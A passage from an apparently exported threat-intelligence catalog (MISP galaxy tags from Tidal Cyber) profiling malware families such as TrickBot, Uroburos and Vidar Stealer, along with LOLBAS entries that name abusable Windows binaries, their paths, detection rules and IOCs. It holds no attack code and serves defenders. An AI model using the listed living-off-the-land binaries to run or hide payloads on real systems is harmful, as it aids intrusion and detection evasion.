[Torisma](https://app.tidalcyber.com/software/4bce135b-91ba-45ae-88f9-09e01f983a74) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [Torisma](https://app.tidalcyber.com/software/4bce135b-91ba-45ae-88f9-09e01f983a74) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.<sup>[[McAfee Lazarus Nov 2020](https://app.tidalcyber.com/references/a283d229-3a2a-43ef-bcbe-aa6d41098b51)]</sup>

The tag is: misp-galaxy:software="Torisma"

Tracker.exe - Associated Software

<sup>[[LOLBAS Tracker](/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup>

The tag is: misp-galaxy:software="Tracker.exe - Associated Software"

Tracker

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool included with Microsoft .Net Framework.

Author: Oddvar Moe

Paths: * no default

Detection: * Sigma: [proc_creation_win_lolbin_tracker.yml]([LOLBAS Tracker(/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup>

The tag is: misp-galaxy:software="Tracker"

TrailBlazer

[TrailBlazer](https://app.tidalcyber.com/software/7a6ae9f8-5f8b-4e94-8716-d8ee82027197) is a modular malware that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2019.<sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:software="TrailBlazer"

TSPY_TRICKLOAD - Associated Software

The tag is: misp-galaxy:software="TSPY_TRICKLOAD - Associated Software"

Totbrick - Associated Software

The tag is: misp-galaxy:software="Totbrick - Associated Software"

TrickBot

[TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724). [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) was developed and initially used by [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.<sup>[[S2 Grupo TrickBot June 2017](https://app.tidalcyber.com/references/28faff77-3e68-4f5c-974d-dc7c9d06ce5e)]</sup><sup>[[Fidelis TrickBot Oct 2016](https://app.tidalcyber.com/references/839c02d1-58ec-4e25-a981-0276dbb1acc8)]</sup><sup>[[IBM TrickBot Nov 2016](https://app.tidalcyber.com/references/092aec63-aea0-4bc9-9c05-add89b4233ff)]</sup><sup>[[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]</sup>

The tag is: misp-galaxy:software="TrickBot"

xFrost - Associated Software

The tag is: misp-galaxy:software="xFrost - Associated Software"

Karagany - Associated Software

The tag is: misp-galaxy:software="Karagany - Associated Software"

Trojan.Karagany

[Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) is a modular remote access tool used for recon and linked to [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1). The source code for [Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. <sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)]</sup><sup>[[Dragos DYMALLOY ](https://app.tidalcyber.com/references/d2785c6e-e0d1-4e90-a2d5-2c302176d5d3)]</sup>

The tag is: misp-galaxy:software="Trojan.Karagany"

Trojan.Mebromi

[Trojan.Mebromi](https://app.tidalcyber.com/software/f8a4213d-633b-4e3d-8e59-a769e852b93b) is BIOS-level malware that takes control of the victim before MBR. <sup>[[Ge 2011](https://app.tidalcyber.com/references/dd6032fb-8913-4593-81b9-86d1239e01f4)]</sup>

The tag is: misp-galaxy:software="Trojan.Mebromi"

TRUECORE - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="TRUECORE - Associated Software"

Silence - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="Silence - Associated Software"

Truebot

Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/truebot/

The tag is: misp-galaxy:software="Truebot"

Truvasys

[Truvasys](https://app.tidalcyber.com/software/50844dba-8999-42ba-ba29-511e3faf4bc3) is first-stage malware that has been used by [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0). It is a collection of modules written in the Delphi programming language. <sup>[[Microsoft Win Defender Truvasys Sep 2017](https://app.tidalcyber.com/references/3c8ba6ef-8edc-44bf-9abe-655ba0f45912)]</sup> <sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup> <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup>

The tag is: misp-galaxy:software="Truvasys"

TSCookie

[TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b) is a remote access tool (RAT) that has been used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in campaigns against Japanese targets.<sup>[[JPCert TSCookie March 2018](https://app.tidalcyber.com/references/ff1717f7-0d2e-4947-87d7-44576affe9f8)]</sup><sup>[[JPCert BlackTech Malware September 2019](https://app.tidalcyber.com/references/26f44bde-f723-4854-8acc-3d95e5fa764a)]</sup>. [TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b) has been referred to as [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) though more recent reporting indicates a separation between the two.<sup>[[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)]</sup><sup>[[JPCert BlackTech Malware September 2019](https://app.tidalcyber.com/references/26f44bde-f723-4854-8acc-3d95e5fa764a)]</sup>

The tag is: misp-galaxy:software="TSCookie"

TShark

TShark is a network protocol analyzer utility.

The tag is: misp-galaxy:software="TShark"

Ttdinject.exe - Associated Software

<sup>[[Ttdinject.exe - LOLBAS Project](/references/3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d)]</sup>

The tag is: misp-galaxy:software="Ttdinject.exe - Associated Software"

Ttdinject

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)

Author: Maxime Nadeau

Paths: * C:\Windows\System32\ttdinject.exe * C:\Windows\Syswow64\ttdinject.exe

Detection: * Sigma: [create_remote_thread_win_ttdinjec.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml) * Sigma: [proc_creation_win_lolbin_ttdinject.yml](https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml) * IOC: Parent child relationship. Ttdinject.exe parent for executed command * IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process<sup>[[Ttdinject.exe - LOLBAS Project](/references/3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d)]</sup>

The tag is: misp-galaxy:software="Ttdinject"

Tttracer.exe - Associated Software

<sup>[[Tttracer.exe - LOLBAS Project](/references/7c88a77e-034e-4847-8bd7-1be3a684a158)]</sup>

The tag is: misp-galaxy:software="Tttracer.exe - Associated Software"

Tttracer

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows 1809 and newer to Debug Time Travel

Author: Oddvar Moe

Paths: * C:\Windows\System32\tttracer.exe * C:\Windows\SysWOW64\tttracer.exe

Detection: * Sigma: [proc_creation_win_lolbin_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml) * Sigma: [image_load_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml) * Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml) * IOC: Parent child relationship. Tttracer parent for executed command<sup>[[Tttracer.exe - LOLBAS Project](/references/7c88a77e-034e-4847-8bd7-1be3a684a158)]</sup>

The tag is: misp-galaxy:software="Tttracer"

Turian

[Turian](https://app.tidalcyber.com/software/571a45a7-68c9-452c-99bf-1d5b5fdd08b3) is a backdoor that has been used by [BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://app.tidalcyber.com/software/571a45a7-68c9-452c-99bf-1d5b5fdd08b3) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.<sup>[[ESET BackdoorDiplomacy Jun 2021](https://app.tidalcyber.com/references/127d4b10-8d61-4bdf-b5b9-7d86bbc065b6)]</sup>

The tag is: misp-galaxy:software="Turian"

TYPEFRAME

The tag is: misp-galaxy:software="TYPEFRAME"

UACMe

[UACMe](https://app.tidalcyber.com/software/5788edee-d1b7-4406-9122-bee596362236) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. <sup>[[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)]</sup>

The tag is: misp-galaxy:software="UACMe"

UBoatRAT

[UBoatRAT](https://app.tidalcyber.com/software/5214ae01-ccd5-4e97-8f9c-14eb16e75544) is a remote access tool that was identified in May 2017.<sup>[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]</sup>

The tag is: misp-galaxy:software="UBoatRAT"

Umbreon

A Linux rootkit that provides backdoor access and hides from defenders.

The tag is: misp-galaxy:software="Umbreon"

Unknown Logger

[Unknown Logger](https://app.tidalcyber.com/software/846b3762-3949-4501-b781-6dca22db088f) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup>

The tag is: misp-galaxy:software="Unknown Logger"

Unregmp2.exe - Associated Software

<sup>[[Unregmp2.exe - LOLBAS Project](/references/9ad11187-bf91-4205-98c7-c7b981e4ab6f)]</sup>

The tag is: misp-galaxy:software="Unregmp2.exe - Associated Software"

Unregmp2

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Windows Media Player Setup Utility

Author: Wade Hickey

Paths: * C:\Windows\System32\unregmp2.exe * C:\Windows\SysWOW64\unregmp2.exe

Detection: * Sigma: [proc_creation_win_lolbin_unregmp2.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml) * IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of unregmp2.exe /HideWMP<sup>[[Unregmp2.exe - LOLBAS Project](/references/9ad11187-bf91-4205-98c7-c7b981e4ab6f)]</sup>

The tag is: misp-galaxy:software="Unregmp2"

Update.exe - Associated Software

<sup>[[Update.exe - LOLBAS Project](/references/2c85d5e5-2cb2-4af7-8c33-8aaac3360706)]</sup>

The tag is: misp-galaxy:software="Update.exe - Associated Software"

Update

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Author: Oddvar Moe

Paths: * %localappdata%\Microsoft\Teams\update.exe

Detection: * Sigma: [proc_creation_win_lolbin_squirrel.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml) * IOC: Update.exe spawned an unknown process<sup>[[Update.exe - LOLBAS Project](/references/2c85d5e5-2cb2-4af7-8c33-8aaac3360706)]</sup>

The tag is: misp-galaxy:software="Update"

ANEL - Associated Software

The tag is: misp-galaxy:software="ANEL - Associated Software"

UPPERCUT

The tag is: misp-galaxy:software="UPPERCUT"

Url.dll - Associated Software

<sup>[[Url.dll - LOLBAS Project](/references/0c88fb72-6be5-4a01-af1c-553650779253)]</sup>

The tag is: misp-galaxy:software="Url.dll - Associated Software"

Snake - Associated Software

<sup>[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]</sup>

The tag is: misp-galaxy:software="Snake - Associated Software"

Uroburos

[Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is a sophisticated cyber espionage tool written in C that has been used by units within Russia’s Federal Security Service (FSB) associated with the [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) toolset to collect intelligence on sensitive targets worldwide. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c) has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.<sup>[[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]</sup><sup>[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]</sup>

The tag is: misp-galaxy:software="Uroburos"

Gozi-ISFB - Associated Software

The tag is: misp-galaxy:software="Gozi-ISFB - Associated Software"

Dreambot - Associated Software

The tag is: misp-galaxy:software="Dreambot - Associated Software"

PE_URSNIF - Associated Software

The tag is: misp-galaxy:software="PE_URSNIF - Associated Software"

Ursnif

[Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)s, and malicious links.<sup>[[NJCCIC Ursnif Sept 2016](https://app.tidalcyber.com/references/d57a2efe-8c98-491e-aecd-e051241a1779)]</sup><sup>[[ProofPoint Ursnif Aug 2016](https://app.tidalcyber.com/references/4cef8c44-d440-4746-b3e8-c8e4d307273d)]</sup> [Ursnif](https://app.tidalcyber.com/software/3e501609-87e4-4c47-bd88-5054be0f1037) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.<sup>[[TrendMicro Ursnif Mar 2015](https://app.tidalcyber.com/references/d02287df-9d93-4cbe-8e59-8f4ef3debc65)]</sup>

The tag is: misp-galaxy:software="Ursnif"

USBferry

[USBferry](https://app.tidalcyber.com/software/26d93db8-dbc3-44b5-a393-2b219cef4f5b) is an information stealing malware and has been used by [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://app.tidalcyber.com/software/26d93db8-dbc3-44b5-a393-2b219cef4f5b) shares an overlapping codebase with [YAHOYAH](https://app.tidalcyber.com/software/0844bc42-5c29-47c3-b1b3-6bfffbf1732a), though it has several features which makes it a distinct piece of malware.<sup>[[TrendMicro Tropic Trooper May 2020](https://app.tidalcyber.com/references/4fbc1df0-f174-4461-817d-0baf6e947ba1)]</sup>

The tag is: misp-galaxy:software="USBferry"

USB Stealer - Associated Software

The tag is: misp-galaxy:software="USB Stealer - Associated Software"

Win32/USBStealer - Associated Software

The tag is: misp-galaxy:software="Win32/USBStealer - Associated Software"

USBStealer

[USBStealer](https://app.tidalcyber.com/software/50eab018-8d52-46f5-8252-95942c2c0a89) is malware that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee). <sup>[[ESET Sednit USBStealer 2014](https://app.tidalcyber.com/references/8673f7fc-5b23-432a-a2d8-700ece46bd0f)]</sup> <sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup>

The tag is: misp-galaxy:software="USBStealer"

UtilityFunctions.ps1 - Associated Software

<sup>[[UtilityFunctions.ps1 - LOLBAS Project](/references/8f15755b-2e32-420e-8463-497e3f8d8cfd)]</sup>

The tag is: misp-galaxy:software="UtilityFunctions.ps1 - Associated Software"

UtilityFunctions

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: PowerShell Diagnostic Script

Author: Jimmy (@bohops)

Paths: * C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1

Detection: * Sigma: [proc_creation_win_lolbas_utilityfunctions.yml]([UtilityFunctions.ps1 - LOLBAS Project(/references/8f15755b-2e32-420e-8463-497e3f8d8cfd)]</sup>

The tag is: misp-galaxy:software="UtilityFunctions"

Valak

[Valak](https://app.tidalcyber.com/software/b149f12f-3cf4-4547-841d-c63b7677547d) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.<sup>[[Cybereason Valak May 2020](https://app.tidalcyber.com/references/235d1cf1-2413-4620-96cf-083d348410c2)]</sup><sup>[[Unit 42 Valak July 2020](https://app.tidalcyber.com/references/9a96da13-5795-49bc-ab82-dfd4f964d9d0)]</sup>

The tag is: misp-galaxy:software="Valak"

VaporRage

The tag is: misp-galaxy:software="VaporRage"

Vasport

The tag is: misp-galaxy:software="Vasport"

vbc.exe - Associated Software

<sup>[[vbc.exe - LOLBAS Project](/references/25eb4048-ee6d-44ca-a70b-37605028bd3c)]</sup>

The tag is: misp-galaxy:software="vbc.exe - Associated Software"

vbc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary file used for compile vbs code

Author: Lior Adar

Paths: * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe

Resources: None Provided

Detection: * Sigma: [proc_creation_win_lolbin_visual_basic_compiler.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml) * Elastic: [defense_evasion_dotnet_compiler_parent_process.toml]([vbc.exe - LOLBAS Project(/references/25eb4048-ee6d-44ca-a70b-37605028bd3c)]</sup>

The tag is: misp-galaxy:software="vbc"

VBShower

The tag is: misp-galaxy:software="VBShower"

Verclsid.exe - Associated Software

<sup>[[LOLBAS Verclsid](/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]</sup>

The tag is: misp-galaxy:software="Verclsid.exe - Associated Software"

Verclsid

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to verify a COM object before it is instantiated by Windows Explorer

Author: @bohops

Paths: * C:\Windows\System32\verclsid.exe * C:\Windows\SysWOW64\verclsid.exe

Detection: * Sigma: [proc_creation_win_verclsid_runs_com.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml) * Splunk: [verclsid_clsid_execution.yml]([LOLBAS Verclsid(/references/63ac9e95-aad8-4735-9e63-f45d8c499030)]</sup>

The tag is: misp-galaxy:software="Verclsid"

VERMIN

[VERMIN](https://app.tidalcyber.com/software/afa4023f-aa2e-45d6-bb3c-38e61f876eac) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. <sup>[[Unit 42 VERMIN Jan 2018](https://app.tidalcyber.com/references/0d6db249-9368-495e-9f1f-c7f10041f5ff)]</sup>

The tag is: misp-galaxy:software="VERMIN"

Vidar Stealer

Vidar Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. While many of today’s most popular infostealers were developed relatively recently, Vidar is more established, having been released in 2018. Its developers continue to add new capabilities, however, for example to improve the malware’s stealth.<sup>[[Minerva Labs Vidar Stealer Evasion](/references/ce9714d3-7f7c-4068-bcc8-0f0eeaf0dc0b)]</sup>

More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).

The tag is: misp-galaxy:software="Vidar Stealer"

VisualUiaVerifyNative.exe - Associated Software

<sup>[[VisualUiaVerifyNative.exe - LOLBAS Project](/references/b17be296-15ad-468f-8157-8cb4093b2e97)]</sup>

The tag is: misp-galaxy:software="VisualUiaVerifyNative.exe - Associated Software"

VisualUiaVerifyNative

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.

Author: Jimmy (@bohops)

Paths: * c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe

The tag is: misp-galaxy:software="VisualUiaVerifyNative"

Volgmer

[Volgmer](https://app.tidalcyber.com/software/7fcfba45-5752-4f0c-8023-db67729ae34e) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. <sup>[[US-CERT Volgmer Nov 2017](https://app.tidalcyber.com/references/c48c7ac0-8d55-4b62-9606-a9ce420459b6)]</sup>

The tag is: misp-galaxy:software="Volgmer"

VSDiagnostics.exe - Associated Software

<sup>[[VSDiagnostics.exe - LOLBAS Project](/references/b4658fc0-af16-45b1-8403-a9676760a36a)]</sup>

The tag is: misp-galaxy:software="VSDiagnostics.exe - Associated Software"

VSDiagnostics

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Command-line tool used for performing diagnostics.

Author: Bobby Cooke

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe

The tag is: misp-galaxy:software="VSDiagnostics"

Vshadow.exe - Associated Software

<sup>[[Vshadow.exe - LOLBAS Project](/references/ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c)]</sup>

The tag is: misp-galaxy:software="Vshadow.exe - Associated Software"

Vshadow

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.

Author: Ayberk Halaç

Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.XXXXX.0\x64\vshadow.exe

Detection: * IOC: vshadow.exe usage with -exec parameter<sup>[[Vshadow.exe - LOLBAS Project](/references/ae3b1e26-d7d7-4049-b4a7-80cd2b149b7c)]</sup>

The tag is: misp-galaxy:software="Vshadow"

VSIISExeLauncher.exe - Associated Software

<sup>[[VSIISExeLauncher.exe - LOLBAS Project](/references/e2fda344-77b8-4650-a7da-1e422db6d3a1)]</sup>

The tag is: misp-galaxy:software="VSIISExeLauncher.exe - Associated Software"

VSIISExeLauncher

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary will execute specified binary. Part of VS/VScode installation.

Author: timwhite

Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe

Detection: * Sigma: [proc_creation_win_lolbin_vsiisexelauncher.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml) * IOC: VSIISExeLauncher.exe spawned an unknown process<sup>[[VSIISExeLauncher.exe - LOLBAS Project](/references/e2fda344-77b8-4650-a7da-1e422db6d3a1)]</sup>

The tag is: misp-galaxy:software="VSIISExeLauncher"

vsjitdebugger.exe - Associated Software

<sup>[[vsjitdebugger.exe - LOLBAS Project](/references/94a880fa-70b0-46c3-997e-b22dc9180134)]</sup>

The tag is: misp-galaxy:software="vsjitdebugger.exe - Associated Software"

vsjitdebugger

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Just-In-Time (JIT) debugger included with Visual Studio

Author: Oddvar Moe

Paths: * c:\windows\system32\vsjitdebugger.exe

Detection: * Sigma: [proc_creation_win_susp_use_of_vsjitdebugger_bin.yml]([vsjitdebugger.exe - LOLBAS Project(/references/94a880fa-70b0-46c3-997e-b22dc9180134)]</sup>

The tag is: misp-galaxy:software="vsjitdebugger"

vsls-agent.exe - Associated Software

<sup>[[vsls-agent.exe - LOLBAS Project](/references/325eab54-bcdd-4a12-ab41-aaf06a0405e9)]</sup>

The tag is: misp-galaxy:software="vsls-agent.exe - Associated Software"

vsls-agent

